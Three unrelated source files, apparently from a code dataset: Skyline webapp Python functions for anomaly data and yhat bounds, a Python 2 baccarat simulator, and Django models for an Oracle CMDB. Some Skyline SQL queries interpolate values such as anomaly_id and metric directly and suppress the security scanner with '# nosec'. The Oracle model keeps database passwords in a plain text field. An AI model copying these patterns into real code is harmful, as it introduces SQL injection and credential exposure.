        window of time series data that is returned
    :type resolution: int
    :return: (luminosity_data, success, message)
    :rtype: tuple
    """
    message = 'luminosity_remote_data returned'
    # NOTE(review): success is initialised here but never set to True on the
    # happy path, so callers always receive success=False - presumably they
    # evaluate luminosity_data instead; confirm before relying on the flag.
    success = False
    luminosity_data = []
    logger.info('luminosity_remote_data :: determining unique_metrics')
    unique_metrics = []
    # If you modify the values of 61 or 600 here, it must be modified in the
    # luminosity_remote_data function in
    # skyline/luminosity/process_correlations.py as well
    # @modified 20201203 - Feature #3860: luminosity - handle low frequency data
    # Use the metric resolution
    # from_timestamp = int(anomaly_timestamp) - 600
    # until_timestamp = int(anomaly_timestamp) + 61
    from_timestamp = int(anomaly_timestamp) - (resolution * 10)
    until_timestamp = int(anomaly_timestamp) + (resolution + 1)
    try:
        # @modified 20201123 - Feature #3824: get_cluster_data
        # Feature #2464: luminosity_remote_data
        # Bug #3266: py3 Redis binary objects not strings
        # Branch #3262: py3
        # unique_metrics = list(REDIS_CONN.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
        REDIS_CONN_DECODED = get_redis_conn_decoded(skyline_app)
        unique_metrics = list(REDIS_CONN_DECODED.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
    except Exception as e:
        logger.error('error :: %s' % str(e))
        logger.error('error :: luminosity_remote_data :: could not determine unique_metrics from Redis set')
    if not unique_metrics:
        message = 'error :: luminosity_remote_data :: could not determine unique_metrics from Redis set'
        return luminosity_data, success, message
    logger.info('luminosity_remote_data :: %s unique_metrics' % str(len(unique_metrics)))
    # @added 20210125 - Feature #3956: luminosity - motifs
    # Improve luminosity_remote_data performance
    # Although the is_derivative_metric function is appropriate in the below
    # loop here that is not the most performant manner in which to determine if
    # the metrics are derivatives, as it needs to fire on every metric, so here
    # we just trust the Redis derivative_metrics list. This increases
    # performance on 1267 metrics from 6.442009 seconds to 1.473067 seconds
    try:
        derivative_metrics = list(REDIS_CONN_DECODED.smembers('derivative_metrics'))
    except:
        derivative_metrics = []
    # assigned metrics
    assigned_min = 0
    assigned_max = len(unique_metrics)
    assigned_keys = range(assigned_min, assigned_max)
    # Compile assigned metrics
    assigned_metrics = [unique_metrics[index] for index in assigned_keys]
    # Check if this process is unnecessary
    if len(assigned_metrics) == 0:
        message = 'error :: luminosity_remote_data :: assigned_metrics length is 0'
        logger.error(message)
        return luminosity_data, success, message
    # Multi get series
    raw_assigned_failed = True
    try:
        raw_assigned = REDIS_CONN.mget(assigned_metrics)
        raw_assigned_failed = False
    except:
        logger.info(traceback.format_exc())
        message = 'error :: luminosity_remote_data :: failed to mget raw_assigned'
        logger.error(message)
        return luminosity_data, success, message
    if raw_assigned_failed:
        message = 'error :: luminosity_remote_data :: failed to mget raw_assigned'
        logger.error(message)
        return luminosity_data, success, message
    # Distill timeseries strings into lists
    for i, metric_name in enumerate(assigned_metrics):
        timeseries = []
        try:
            # Each Redis value is a msgpack stream of (timestamp, value) tuples
            raw_series = raw_assigned[i]
            unpacker = Unpacker(use_list=False)
            unpacker.feed(raw_series)
            timeseries = list(unpacker)
        except:
            timeseries = []
        if not timeseries:
            continue
        # @added 20200507 - Feature #3532: Sort all time series
        # To ensure that there are no unordered timestamps in the time
        # series which are artefacts of the collector or carbon-relay, sort
        # all time series by timestamp before analysis.
        original_timeseries = timeseries
        if original_timeseries:
            timeseries = sort_timeseries(original_timeseries)
            del original_timeseries
        # Convert the time series if this is a known_derivative_metric
        # @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
        # base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
        # @added 20201117 - Feature #3824: get_cluster_data
        # Feature #2464: luminosity_remote_data
        # Bug #3266: py3 Redis binary objects not strings
        # Branch #3262: py3
        # Convert metric_name bytes to str
        metric_name = str(metric_name)
        # @modified 20210125 - Feature #3956: luminosity - motifs
        # Improve luminosity_remote_data performance
        # Although the is_derivative_metric function is appropriate here it is
        # not the most performant manner in which to determine if the metric
        # is a derivative in this case as it needs to fire on every metric, so
        # here we just trust the Redis derivative_metrics list. This increases
        # performance on 1267 metrics from 6.442009 seconds to 1.473067 seconds
        # if metric_name.startswith(settings.FULL_NAMESPACE):
        #     base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
        # else:
        #     base_name = metric_name
        # known_derivative_metric = is_derivative_metric('webapp', base_name)
        known_derivative_metric = False
        if metric_name in derivative_metrics:
            known_derivative_metric = True
        if known_derivative_metric:
            try:
                derivative_timeseries = nonNegativeDerivative(timeseries)
                timeseries = derivative_timeseries
            except:
                logger.error('error :: nonNegativeDerivative failed')
        # @modified 20210125 - Feature #3956: luminosity - motifs
        # Improve luminosity_remote_data performance
        # The list comprehension method halves the time to create the
        # correlate_ts from 0.0008357290644198656 to 0.0004676780663430691 seconds
        # correlate_ts = []
        # for ts, value in timeseries:
        #     if int(ts) < from_timestamp:
        #         continue
        #     if int(ts) <= anomaly_timestamp:
        #         correlate_ts.append((int(ts), value))
        #     if int(ts) > (anomaly_timestamp + until_timestamp):
        #         break
        # Keep only the fragment of the series inside the window of interest
        correlate_ts = [x for x in timeseries if x[0] >= from_timestamp if x[0] <= until_timestamp]
        if not correlate_ts:
            continue
        metric_data = [str(metric_name), correlate_ts]
        luminosity_data.append(metric_data)
    logger.info('luminosity_remote_data :: %s valid metric time series data preprocessed for the remote request' % str(len(luminosity_data)))
    return luminosity_data, success, message
# @added 20200908 - Feature #3740: webapp - anomaly API endpoint
def panorama_anomaly_details(anomaly_id):
    """
    Gets the details for an anomaly from the database.

    Returns a list of [id, metric, anomalous_datapoint, anomaly_timestamp,
    full_duration, created_timestamp, anomaly_end_timestamp], None when the
    id matched no anomaly rows, or False when a database query failed.
    """
    logger.info('panorama_anomaly_details - getting details for anomaly id %s' % str(anomaly_id))
    # First resolve which metric the anomaly belongs to
    metric_id = 0
    # nosec annotations exclude the interpolated queries from bandit tests
    query = 'select metric_id from anomalies WHERE id=\'%s\'' % str(anomaly_id)  # nosec
    try:
        metric_id = int(mysql_select(skyline_app, query)[0][0])
    except:
        logger.error(traceback.format_exc())
        logger.error('error :: panorama_anomaly_details - failed to get metric_id from db')
        return False
    if metric_id > 0:
        logger.info('panorama_anomaly_details - getting metric for metric_id - %s' % str(metric_id))
        query = 'select metric from metrics WHERE id=\'%s\'' % str(metric_id)  # nosec
        try:
            metric = str(mysql_select(skyline_app, query)[0][0])
        except:
            logger.error(traceback.format_exc())
            logger.error('error :: panorama_anomaly_details - failed to get metric from db')
            return False
    query = 'select id, metric_id, anomalous_datapoint, anomaly_timestamp, full_duration, created_timestamp, anomaly_end_timestamp from anomalies WHERE id=\'%s\'' % str(anomaly_id)  # nosec
    logger.info('panorama_anomaly_details - running query - %s' % str(query))
    try:
        anomaly_rows = mysql_select(skyline_app, query)
    except:
        logger.error(traceback.format_exc())
        logger.error('error :: panorama_anomaly_details - failed to get anomaly details from db')
        return False
    anomaly_data = None
    # Only the first matching row is used
    for row in anomaly_rows:
        anomaly_data = [
            int(anomaly_id), str(metric), float(row[2]), int(row[3]),
            int(row[4]), str(row[5])]
        # anomaly_end_timestamp can be NULL in the db
        try:
            anomaly_data.append(int(row[6]))
        except:
            anomaly_data.append(None)
        break
    return anomaly_data
# @added 20201103 - Feature #3824: get_cluster_data
# @modified 20201127 - Feature #3824: get_cluster_data
#                      Feature #3820: HORIZON_SHARDS
# Allow to query only a single host in the cluster so that just the response
# can from a single host in the cluster can be evaluated
def get_cluster_data(api_endpoint, data_required, only_host='all', endpoint_params=None):
    """
    Gets data from the /api of REMOTE_SKYLINE_INSTANCES. This allows the user
    to query a single Skyline webapp node in a cluster and the Skyline instance
    will respond with the concentated responses of all the
    REMOTE_SKYLINE_INSTANCES in one a single response.

    :param api_endpoint: the api endpoint to request data from the remote
        Skyline instances
    :param data_required: the element from the api json response that is
        required
    :param only_host: The remote Skyline host to query, if not passed all are
        queried.
    :param endpoint_params: A dictionary of any additional parameters that may
        be required
    :type api_endpoint: str
    :type data_required: str
    :type only_host: str
    :type endpoint_params: dict
    :return: list
    :rtype: list
    """
    # @modified: endpoint_params previously defaulted to a mutable {} which
    # Python shares between calls; default to None and create a fresh dict
    if endpoint_params is None:
        endpoint_params = {}
    try:
        connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
        read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
    except:
        connect_timeout = 5
        read_timeout = 10
    use_timeout = (int(connect_timeout), int(read_timeout))
    data = []
    if only_host != 'all':
        # @modified: fixed the inverted log message - this branch fires when
        # a single host has been requested, not when all hosts are queried
        logger.info('get_cluster_data :: only querying remote host %s as only_host is set' % (
            str(only_host)))
    for item in settings.REMOTE_SKYLINE_INSTANCES:
        r = None
        user = None
        password = None
        use_auth = False
        # @added 20201127 - Feature #3824: get_cluster_data
        # Feature #3820: HORIZON_SHARDS
        # Allow to query only a single host in the cluster so that just the response
        # can from a single host in the cluster can be evaluated
        if only_host != 'all':
            if only_host != str(item[0]):
                logger.info('get_cluster_data :: not querying %s as only_host set to %s' % (
                    str(item[0]), str(only_host)))
                continue
            else:
                logger.info('get_cluster_data :: querying %s as only_host set to %s' % (
                    str(item[0]), str(only_host)))
        # REMOTE_SKYLINE_INSTANCES items may optionally carry basic auth
        # credentials at indices 1 and 2
        try:
            user = str(item[1])
            password = str(item[2])
            use_auth = True
        except:
            user = None
            password = None
        logger.info('get_cluster_data :: querying %s for %s on %s' % (
            str(item[0]), str(data_required), str(api_endpoint)))
        try:
            url = '%s/api?%s' % (str(item[0]), api_endpoint)
            if use_auth:
                r = requests.get(url, timeout=use_timeout, auth=(user, password))
            else:
                r = requests.get(url, timeout=use_timeout)
        except:
            logger.error(traceback.format_exc())
            logger.error('error :: get_cluster_data :: failed to %s from %s' % (
                api_endpoint, str(item)))
        if r:
            # Non-200 responses are logged but a json parse is still attempted
            if r.status_code != 200:
                logger.error('error :: get_cluster_data :: %s from %s responded with status code %s and reason %s' % (
                    api_endpoint, str(item), str(r.status_code), str(r.reason)))
            js = None
            try:
                js = r.json()
            except:
                logger.error(traceback.format_exc())
                logger.error('error :: get_cluster_data :: failed to get json from the response from %s on %s' % (
                    api_endpoint, str(item)))
            remote_data = []
            if js:
                logger.info('get_cluster_data :: got response for %s from %s' % (
                    str(data_required), str(item[0])))
                try:
                    remote_data = js['data'][data_required]
                except:
                    logger.error(traceback.format_exc())
                    logger.error('error :: get_cluster_data :: failed to build remote_data from %s on %s' % (
                        str(data_required), str(item)))
            if remote_data:
                logger.info('get_cluster_data :: got %s %s from %s' % (
                    str(len(remote_data)), str(data_required), str(item[0])))
                # Concatenate the per-host responses into a single list
                data = data + remote_data
    return data
# @added 20201125 - Feature #3850: webapp - yhat_values API endoint
def get_yhat_values(
        metric, from_timestamp, until_timestamp, include_value, include_mean,
        include_yhat_real_lower, include_anomalous_periods):
    """
    Calculate per-timestamp yhat (expected value boundary) values for a
    metric time series fetched from Graphite, along with rectangle
    coordinates that describe anomalous periods, and cache both in Redis.

    :param metric: the metric base name
    :param from_timestamp: unix timestamp of the start of the period
    :param until_timestamp: unix timestamp of the end of the period
    :param include_value: include the original data point value per timestamp
    :param include_mean: include the running mean per timestamp
    :param include_yhat_real_lower: include a yhat_real_lower value that is
        clipped at 0 for time series that never go negative
    :param include_anomalous_periods: include the anomalous_period flag per
        timestamp
    :return: (yhat_dict, anomalous_periods_dict) or None on failure
    """
    timeseries = []
    try:
        logger.info('get_yhat_values :: for %s from %s until %s' % (
            metric, str(from_timestamp), str(until_timestamp)))
        timeseries = get_graphite_metric('webapp', metric, from_timestamp, until_timestamp, 'list', 'object')
    except:
        logger.error(traceback.format_exc())
        logger.error('error :: get_yhat_values :: failed to get timeseries data for %s' % (
            metric))
        return None
    yhat_dict = {}
    logger.info('get_yhat_values :: %s values in timeseries for %s to calculate yhat values from' % (
        str(len(timeseries)), metric))
    # @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
    anomalous_periods_dict = {}
    if timeseries:
        # Resolve the metric id so that known anomalies within the requested
        # window can be fetched from the database
        metric_id = 0
        if metric:
            logger.info('get_yhat_values :: getting db id for metric - %s' % metric)
            query = 'select id from metrics WHERE metric=\'%s\'' % metric  # nosec
            try:
                result = mysql_select(skyline_app, query)
                metric_id = int(result[0][0])
            except:
                logger.error('error :: get_yhat_values :: failed to get id from db: %s' % traceback.format_exc())
        anomalies_at = []
        if metric_id:
            logger.info('get_yhat_values :: getting latest anomalies')
            query = 'select anomaly_timestamp, anomalous_datapoint, anomaly_end_timestamp from anomalies WHERE metric_id=%s AND anomaly_timestamp >= %s AND anomaly_timestamp <= %s' % (
                str(metric_id), str(from_timestamp), str(until_timestamp))
            try:
                rows = mysql_select(skyline_app, query)
                for row in rows:
                    a_timestamp = int(row[0])
                    a_value = float(row[1])
                    # anomaly_end_timestamp can be NULL in the db
                    try:
                        a_end_timestamp = int(row[2])
                    except:
                        a_end_timestamp = 0
                    anomalies_at.append([a_timestamp, a_value, a_end_timestamp])
            except:
                logger.error('error :: get_yhat_values :: failed to get anomalies from db: %s' % traceback.format_exc())
                rows = []
        # Build, per datapoint, the range of timestamps it covers so that an
        # anomaly timestamp falling between datapoints still maps to an index
        timeseries_ranges = []
        last_timestamp = None
        for index, item in enumerate(timeseries):
            if last_timestamp:
                t_range = list(range(last_timestamp, int(item[0])))
                timeseries_ranges.append([index, t_range, item])
            last_timestamp = int(item[0])
            t_range = list(range(last_timestamp, (int(item[0]) + 1)))
            timeseries_ranges.append([index, t_range, item])
        # Indices of datapoints that coincide with a known anomaly
        anomalies_index = []
        for index, time_range, item in timeseries_ranges:
            for a_timestamp, a_value, a_end_timestamp in anomalies_at:
                if a_timestamp in time_range:
                    anomalies_index.append([index, item])
        # Indices in a window around each anomaly (3 before to 4 after)
        anomalous_period_indices = []
        anomalies_indices = [item[0] for item in anomalies_index]
        for index, item in enumerate(timeseries):
            for idx in anomalies_indices:
                anomaly_index_range = list(range((idx - 3), (idx + 5)))
                if index in anomaly_index_range:
                    for i in anomaly_index_range:
                        anomalous_period_indices.append(i)
        anomaly_timestamps_indices = []
        anomalies = []
        for item in anomalies_index:
            anomaly_timestamps_indices.append(item[0])
            anomalies.append(item[1])
    if timeseries:
        try:
            array_amin = np.amin([item[1] for item in timeseries])
            values = []
            # @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
            # last_value = None
            # start_anomalous_period = None
            # end_anomalous_period = None
            # sigma3_array = []
            # sigma3_values = []
            # extended_values = []
            last_breach = 0
            breach_for = 10
            last_breach_vector = 'positive'
            # last_used_extended = False
            # last_used_extended_value = None
            # Rectangle coordinates for anomalous periods, returned in
            # anomalous_periods_dict below
            top = []
            bottom = []
            left = []
            right = []
            # @modified 20210126 - Task #3958: Handle secondary algorithms in yhat_values
            # for ts, value in timeseries:
            #     values.append(value)
            #     va = np.array(values)
            #     va_mean = va.mean()
            #     va_std_3 = 3 * va.std()
            for index, item in enumerate(timeseries):
                ts = item[0]
                value = item[1]
                # Running mean and 3-sigma band over all values seen so far
                values.append(value)
                va = np.array(values)
                va_mean = va.mean()
                va_std_3 = 3 * va.std()
                # @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
                anomalous_period = 0
                three_sigma_lower = va_mean - va_std_3
                three_sigma_upper = va_mean + va_std_3
                # sigma3_array.append([ts, value, va_mean, [three_sigma_lower, three_sigma_upper]])
                # sigma3_values.append([three_sigma_lower, three_sigma_upper])
                use_extended = False
                drop_expected_range = False
                if index not in anomaly_timestamps_indices:
                    use_extended = True
                    # if last_used_extended:
                    #     last_used_extended_value = None
                else:
                    drop_expected_range = True
                # Within breach_for datapoints after an anomaly the extended
                # band is not used and the period is flagged anomalous
                for anomaly_index in anomaly_timestamps_indices:
                    if index > anomaly_index:
                        # if index < (anomaly_index + 30):
                        if index < (anomaly_index + breach_for):
                            use_extended = False
                            anomalous_period = 1
                            break
                extended_lower = three_sigma_lower
                extended_upper = three_sigma_upper
                if use_extended:
                    if item[1] > three_sigma_upper:
                        # Value breached the upper band - extend upwards by 5%
                        extended_lower = three_sigma_lower
                        extended_upper = (item[1] + ((item[1] / 100) * 5))
                        last_breach = index
                        last_breach_vector = 'positive'
                    elif item[1] < three_sigma_lower:
                        # Value breached the lower band - extend downwards by 5%
                        extended_lower = (item[1] - ((item[1] / 100) * 5))
                        extended_upper = three_sigma_upper
                        last_breach = index
                        last_breach_vector = 'negative'
                    elif index < (last_breach + breach_for) and index > last_breach:
                        # Still within breach_for datapoints of the last breach
                        if last_breach_vector == 'positive':
                            extended_value = (item[1] + ((item[1] / 100) * 5))
                            three_sigma_value = three_sigma_upper
                            if three_sigma_value > extended_value:
                                extended_value = (three_sigma_value + ((three_sigma_value / 100) * 5))
                            extended_lower = three_sigma_lower
                            extended_upper = extended_value
                        else:
                            extended_lower = (item[1] - ((item[1] / 100) * 5))
                            extended_upper = three_sigma_upper
                        if drop_expected_range:
                            use_extended = False
                            if last_breach_vector == 'positive':
                                extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
                                extended_upper = item[1] - (item[1] * 0.1)
                            if last_breach_vector == 'negative':
                                extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
                                extended_upper = item[1] + (item[1] * 0.1)
                    else:
                        extended_lower = three_sigma_lower
                        extended_upper = three_sigma_upper
                        if drop_expected_range:
                            use_extended = False
                            if last_breach_vector == 'positive':
                                extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
                                extended_upper = item[1] - (item[1] * 0.1)
                            if last_breach_vector == 'negative':
                                extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
                                extended_upper = item[1] + (item[1] * 0.1)
                else:
                    extended_lower = three_sigma_lower
                    extended_upper = three_sigma_upper
                    if drop_expected_range:
                        use_extended = False
                        if last_breach_vector == 'positive':
                            extended_lower = three_sigma_lower - (three_sigma_upper * 0.1)
                            extended_upper = item[1] - (item[1] * 0.1)
                        if last_breach_vector == 'negative':
                            extended_lower = three_sigma_lower - (three_sigma_lower * 0.1)
                            extended_upper = item[1] + (item[1] * 0.1)
                # extended_values.append([extended_lower, extended_upper])
                lower = extended_lower
                upper = extended_upper
                # Collect rectangle coordinates around each anomaly; note the
                # continue skips the anomaly datapoint itself so no yhat_dict
                # entry is created for it
                if index in sorted(list(set(anomalous_period_indices))):
                    if index in anomalies_indices:
                        continue
                    for idx in anomaly_timestamps_indices:
                        if (index + 3) == idx:
                            a_top = extended_upper + (extended_upper * 0.1)
                            top.append(a_top)
                            a_bottom = extended_lower - (extended_lower * 0.1)
                            bottom.append(a_bottom)
                            a_left = item[0]
                            left.append(a_left)
                        if (index - 4) == idx:
                            a_right = item[0]
                            right.append(a_right)
                # @modified 20201126 - Feature #3850: webapp - yhat_values API endoint
                # Change dict key to int not float
                int_ts = int(ts)
                yhat_dict[int_ts] = {}
                if include_value:
                    yhat_dict[int_ts]['value'] = value
                if include_mean:
                    yhat_dict[int_ts]['mean'] = va_mean
                # NOTE(review): this duplicated include_mean block repeats the
                # assignment above and is redundant
                if include_mean:
                    yhat_dict[int_ts]['mean'] = va_mean
                # @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
                # yhat_lower = va_mean - va_std_3
                yhat_lower = lower
                yhat_upper = upper
                if include_yhat_real_lower:
                    # @modified 20201202 - Feature #3850: webapp - yhat_values API endoint
                    # Set the yhat_real_lower correctly
                    # if yhat_lower < array_amin and array_amin == 0:
                    #     yhat_dict[int_ts]['yhat_real_lower'] = array_amin
                    if yhat_lower < 0 and array_amin > -0.0000000001:
                        yhat_dict[int_ts]['yhat_real_lower'] = 0
                    else:
                        yhat_dict[int_ts]['yhat_real_lower'] = yhat_lower
                yhat_dict[int_ts]['yhat_lower'] = yhat_lower
                # @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
                # NOTE(review): the first yhat_upper assignment below is dead
                # code - it is immediately overwritten by the second
                yhat_dict[int_ts]['yhat_upper'] = va_mean + va_std_3
                yhat_dict[int_ts]['yhat_upper'] = upper
                # @added 20210201 - Task #3958: Handle secondary algorithms in yhat_values
                if use_extended:
                    if yhat_lower != three_sigma_lower:
                        yhat_dict[int_ts]['3sigma_lower'] = three_sigma_lower
                    if yhat_upper != three_sigma_upper:
                        yhat_dict[int_ts]['3sigma_upper'] = three_sigma_upper
                if include_anomalous_periods:
                    yhat_dict[int_ts]['anomalous_period'] = anomalous_period
        except:
            logger.error(traceback.format_exc())
            logger.error('error :: get_yhat_values :: failed create yhat_dict for %s' % (
                metric))
            return None
    logger.info('get_yhat_values :: calculated yhat values for %s data points' % str(len(yhat_dict)))
    if yhat_dict:
        yhat_dict_cache_key = 'webapp.%s.%s.%s.%s.%s.%s' % (
            metric, str(from_timestamp), str(until_timestamp),
            str(include_value), str(include_mean),
            str(include_yhat_real_lower))
        logger.info('get_yhat_values :: saving yhat_dict to Redis key - %s' % yhat_dict_cache_key)
        try:
            REDIS_CONN.setex(yhat_dict_cache_key, 14400, str(yhat_dict))
            logger.info('get_yhat_values :: created Redis key - %s with 14400 TTL' % yhat_dict_cache_key)
        except:
            logger.error(traceback.format_exc())
            logger.error('error :: get_yhat_values :: failed to setex Redis key - %s' % yhat_dict_cache_key)
        # @added 20210126 - Task #3958: Handle secondary algorithms in yhat_values
        # Add rectangle coordinates that describe anomalous periods
        anomalous_periods_dict['rectangles'] = {}
        anomalous_periods_dict['rectangles']['top'] = top
        anomalous_periods_dict['rectangles']['bottom'] = bottom
        anomalous_periods_dict['rectangles']['left'] = left
        anomalous_periods_dict['rectangles']['right'] = right
    if anomalous_periods_dict:
        yhat_anomalous_periods_dict_cache_key = 'webapp.%s.%s.%s.%s.%s.%s.anomalous_periods' % (
            metric, str(from_timestamp), str(until_timestamp),
            str(include_value), str(include_mean),
            str(include_yhat_real_lower))
        logger.info('get_yhat_values :: saving yhat_dict to Redis key - %s' % yhat_anomalous_periods_dict_cache_key)
        try:
            # NOTE(review): this stores the cache key name string as the
            # value rather than the anomalous periods data - presumably
            # str(anomalous_periods_dict) was intended; confirm
            REDIS_CONN.setex(yhat_anomalous_periods_dict_cache_key, 14400, str(yhat_anomalous_periods_dict_cache_key))
            logger.info('get_yhat_values :: created Redis key - %s with 14400 TTL' % yhat_anomalous_periods_dict_cache_key)
        except:
            logger.error(traceback.format_exc())
            logger.error('error :: get_yhat_values :: failed to setex Redis key - %s' % yhat_dict_cache_key)
    # @modified 20210201 - Task #3958: Handle secondary algorithms in yhat_values
    # return yhat_dict
    return yhat_dict, anomalous_periods_dict
| [
"gary.wilson@of-networks.co.uk"
] | gary.wilson@of-networks.co.uk |
4566d265de8c9de17ff705716fb33d9a946acd40 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /dockerized-gists/2632280/snippet.py | 2c3e53153055035e65c3c069b7b509579d65212b | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 2,057 | py | #!/usr/bin/python
#
import sys
import os
import copy
import random
# One suit's worth of baccarat card values: ace-9 count at face value and
# the four ten-value cards (10, J, Q, K) count as 0.
# Removed the accidental duplicate assignment of this list.
deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 0, 0, 0]
# Running tally of simulated outcomes, mutated by main()
results = {
    'bank': 0,
    'player': 0,
    'tie': 0,
}
def generate_deck(n=1):
    """Build and shuffle a shoe of n 52-card decks.

    Card values are baccarat values: ace-9 at face value, ten-value cards
    as 0. Previously this relied on the module-level ``deck`` global; the
    single-suit template is now local so the function is self-contained.

    :param n: number of 52-card decks in the shoe
    :return: a shuffled flat list of n * 52 card values
    """
    single_suit = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 0, 0, 0]
    decks = single_suit * 4 * n
    random.shuffle(decks)
    return decks
def simulate_game(decks):
    """Play one punto banco (baccarat) hand, consuming cards from decks.

    Cards are drawn with decks.pop(). Returns 'player', 'bank' or 'tie'.

    Bug fix: in the original, the banker's "draw on 0-5 when the player
    stands" rule was nested inside the player-draw branch, where it was
    unreachable (the pcard cases are exhaustive). It now applies, per the
    standard tableau, when the player stands on 6 or 7.
    """
    player = [decks.pop()]
    bank = [decks.pop()]
    player.append(decks.pop())
    bank.append(decks.pop())
    player_score = sum(player) % 10
    bank_score = sum(bank) % 10
    # A natural 8 or 9 on either side ends the hand immediately
    if player_score >= 8 or bank_score >= 8:
        if player_score > bank_score:
            return 'player'
        elif bank_score > player_score:
            return 'bank'
        else:
            return 'tie'
    if player_score <= 5:
        # Player draws a third card
        pcard = decks.pop()
        player.append(pcard)
        # Banker third-card tableau, keyed on the player's third card
        if pcard in (2, 3) and bank_score <= 4:
            bank.append(decks.pop())
        elif pcard in (4, 5) and bank_score <= 5:
            bank.append(decks.pop())
        elif pcard in (6, 7) and bank_score <= 6:
            bank.append(decks.pop())
        elif pcard == 8 and bank_score <= 2:
            bank.append(decks.pop())
        elif pcard in (1, 9, 0) and bank_score <= 3:
            bank.append(decks.pop())
    elif bank_score <= 5:
        # Player stood on 6 or 7: banker draws on totals 0-5
        bank.append(decks.pop())
    player_score = sum(player) % 10
    bank_score = sum(bank) % 10
    if player_score == bank_score:
        return 'tie'
    return 'player' if player_score > bank_score else 'bank'
def main():
    # Simulate many shoes of baccarat and print the empirical win
    # probabilities, tallying outcomes in the module-level `results` dict.
    for i in range(3000):
        # 3000 game / 8 decks of cards each
        decks = generate_deck(8)
        # Keep dealing hands from the shoe until too few cards remain for a
        # worst-case hand (up to 6 cards)
        while len(decks) > 10:
            winner = simulate_game(decks)
            results[winner] += 1
    total = results['player'] + results['bank'] + results['tie']
    # NOTE: Python 2 print statements - this script is not Python 3
    # compatible. Also "probabilties" is a typo for "probabilities".
    print "Baccarat probabilties"
    print 'P(win|player)', results['player'] / float(total)
    print 'P(win|bank)  ', results['bank'] / float(total)
    print 'P(tie)       ', results['tie'] / float(total)
# Script entry point: run the simulation when executed directly
if __name__=="__main__":
    main()
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
40ad77e61a4e82b015bf0da7e66515953ad9eed4 | 2b5fd9d436a97726f852a12bab58b8d367f4866a | /apps/CMDB/model/oracle_modles.py | 85cecdfda15e7e6ac6002550d0218e5453001bc2 | [] | no_license | lxlzyf/roe | 07ff551b142c0411acb7ca6f759ea98b40ad9b72 | 2d7f1b01e2456875d14a75c90d8397965215bcd3 | refs/heads/master | 2020-03-27T06:00:43.587235 | 2018-08-20T10:47:47 | 2018-08-20T10:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,361 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from CMDB.model.yewutree_model import YewuTree
from django.contrib.auth.models import User
# A cluster always belongs to exactly one product line and may belong to
# several groups; a single standalone node is also modelled as a cluster.
class OracleCluster(models.Model):
    # Choices for the architecture field below.
    # NOTE(review): this tuple name is shadowed by the `arch` field defined
    # later in the class body; it works because choices=arch is evaluated
    # before the name is rebound, but a distinct name (e.g. ARCH_CHOICES)
    # would be clearer.
    # NOTE(review): the display label for u"单机" (standalone) is u"单击"
    # ("click") - looks like a typo; confirm before changing, as the label
    # is also the stored value.
    arch = (
        (u"主从", u"主从"),
        (u"单机", u"单击"),
        (u"rac", u"rac"),
        (u"rac+从库", u"rac+从库")
    )
    # Cluster name
    name = models.CharField(u"集群名", max_length=30, blank=True, null=True)
    # Cluster architecture, constrained to the choices tuple above
    arch = models.CharField(verbose_name=u"集群架构", choices=arch, max_length=30, null=True, blank=True)
    # Oracle database version string
    db_version = models.CharField(verbose_name=u"数据库版本", max_length=30, null=True, blank=True)
    # Primary / default database of the cluster
    defaultdb = models.CharField(verbose_name=u"主用DB", max_length=30, null=True, blank=True)
    # Owning product line in the business tree
    tree_id = models.ForeignKey(YewuTree, verbose_name=u"所属产品线", on_delete=models.SET_NULL, null=True, blank=True)
    # Free-form description
    desc = models.CharField(u"描述", max_length=100, null=True, blank=True)
    # Users allowed to see this cluster
    operator = models.ManyToManyField(User, verbose_name="可见的人", blank=True)

    def __unicode__(self):
        return self.name

    class Meta:
        db_table = 'Oracle_Cluster'
        verbose_name = 'Oracle 集群'
        verbose_name_plural = 'Oracle集群'
# Product lines are partitioned by database user.
class OracleUser(models.Model):
    # Database account name
    db_user = models.CharField(max_length=30, null=True, blank=True)
    # NOTE(review): the password is stored as a plain CharField - verify
    # whether it is encrypted elsewhere before treating this as safe.
    db_password = models.CharField(max_length=60, null=True, blank=True)
    # Granted privileges, stored as a free-form string
    privlige = models.CharField(verbose_name='权限', max_length=400, null=True, blank=True)
    # Cluster this user belongs to
    dbcluster = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)

    def __unicode__(self):
        return self.db_user

    class Meta:
        db_table = 'Oracle_User'
        verbose_name = 'Oracle用户'
        verbose_name_plural = 'Oracle用户'
# DB / tablespace information within a database.
class Oracletablespace(models.Model):
    # Tablespace name
    tablespace_name = models.CharField(max_length=50, verbose_name=u"表空间名")
    # Cluster the tablespace belongs to
    dbcluster = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
    # Tablespace size, stored as a free-form string
    tablespace_size = models.CharField(max_length=50, verbose_name=u"库大小")

    def __unicode__(self):
        return u'%s ' % (self.tablespace_name)

    class Meta:
        db_table = 'Oracle_Tablespace'
        verbose_name = 'Oracle 表空间'
        verbose_name_plural = 'Oracle表空间'
